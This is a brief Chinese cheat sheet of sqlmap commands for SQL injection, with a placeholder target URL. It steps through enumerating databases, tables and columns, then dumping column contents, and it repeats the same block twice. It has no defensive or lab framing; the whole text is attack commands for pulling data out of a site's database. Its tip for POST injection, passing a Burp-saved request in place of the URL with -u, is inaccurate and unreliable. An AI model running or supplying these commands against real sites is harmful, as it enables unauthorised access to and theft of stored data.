爆所有数据库名
sqlmap -u "url" --dbs
指定库名的所有表
sqlmap -u "url" -D datename --tables
指定库名表名的所有字段
sqlmap -u "url" -D dname -T tname --columns
指定库名表名字段爆字段内容
sqlmap -u "url" -D dname -T tname -C cname1,cname2 --dump
post的注入
将url换成burp里存下来的包的地址即可
sqlmap -u "url" --dbs
sqlmap -u "url" -D datename --tables
sqlmap -u "url" -D dname -T tname --columns
sqlmap -u "url" -D dname -T tname -C cname1,cname2 --dump
post的注入
将url换成burp里存下来的包的地址即可